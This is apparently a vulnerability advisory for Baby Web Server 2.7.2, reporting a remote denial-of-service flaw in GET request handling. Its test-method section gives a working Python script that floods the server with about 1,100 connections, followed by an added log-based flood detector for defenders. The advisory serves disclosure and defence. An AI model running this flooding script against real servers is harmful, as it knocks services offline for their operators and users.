Pablo Software Solutions Baby Web Server Multiple Remote Denial-of-Service Vulnerabilities

Cause
Failure to handle exceptional conditions
 
Affected systems
Pablo Software Solutions Baby Web Server 2.7.2
 
Unaffected systems
 
Impact
A remote attacker can exploit the vulnerability to carry out a denial-of-service attack against the system.
 
Conditions required for attack
The attacker must be able to access Baby Web Server.
 
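Vulnerability information
Pablo Software Solutions Baby Web Server is a web server program.
Baby Web Server does not correctly handle GET requests submitted by users; a remote attacker can exploit the vulnerability to carry out a denial-of-service attack against the system.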
 
Test method
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of  requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (1,1100):
       request =  "GET /some.txt HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Oh! Some Problem Occured Check Server is Running or Not"
 
Vendor solution
No solution is currently available:
http://www.pablosoftwaresolutions.com/html/baby_web_server.html
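
With no vendor fix listed, a defender can watch for the burst pattern the test above produces: roughly 1,100 connections from a single source within seconds. The sliding-window detector below is an added example, not part of the original advisory; the log format, addresses, thresholds and function names are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_line(line):
    # Assumed (hypothetical) log format: "<ISO timestamp> <source IP> <request line>"
    ts, src, request = line.split(" ", 2)
    return datetime.fromisoformat(ts), src, request


def find_floods(lines, max_conns=100, window_s=10):
    """Return {source: peak connection count} for sources that exceed
    max_conns connections inside any window_s-second sliding window."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # source -> timestamps still inside the window
    peaks = {}
    for line in lines:
        try:
            ts, src, _ = parse_line(line)
        except ValueError:
            continue  # skip malformed lines instead of aborting the scan
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # evict events older than the window
            q.popleft()
        if len(q) > max_conns:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


def sample_log():
    """Constructed sample: one source opening 1099 connections in under 6 s,
    one ordinary client, and one malformed line."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    for i in range(1, 1100):
        t = base + timedelta(milliseconds=5 * i)
        lines.append(f"{t.isoformat()} 192.0.2.10 GET /some.txt HTTP/1.1")
    for i in range(20):
        t = base + timedelta(seconds=3 * i)
        lines.append(f"{t.isoformat()} 198.51.100.7 GET /index.html HTTP/1.1")
    lines.append("garbage")
    return sorted(lines)  # ISO timestamps sort chronologically as text


if __name__ == "__main__":
    for src, peak in find_floods(sample_log()).items():
        print(f"possible connection flood from {src}: {peak} connections in 10 s")
```

The same per-source threshold can be enforced rather than just reported by placing a connection-limiting proxy or firewall rule in front of the server.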
 
Vulnerability reported by
Asheesh kumar Mani Tripathi
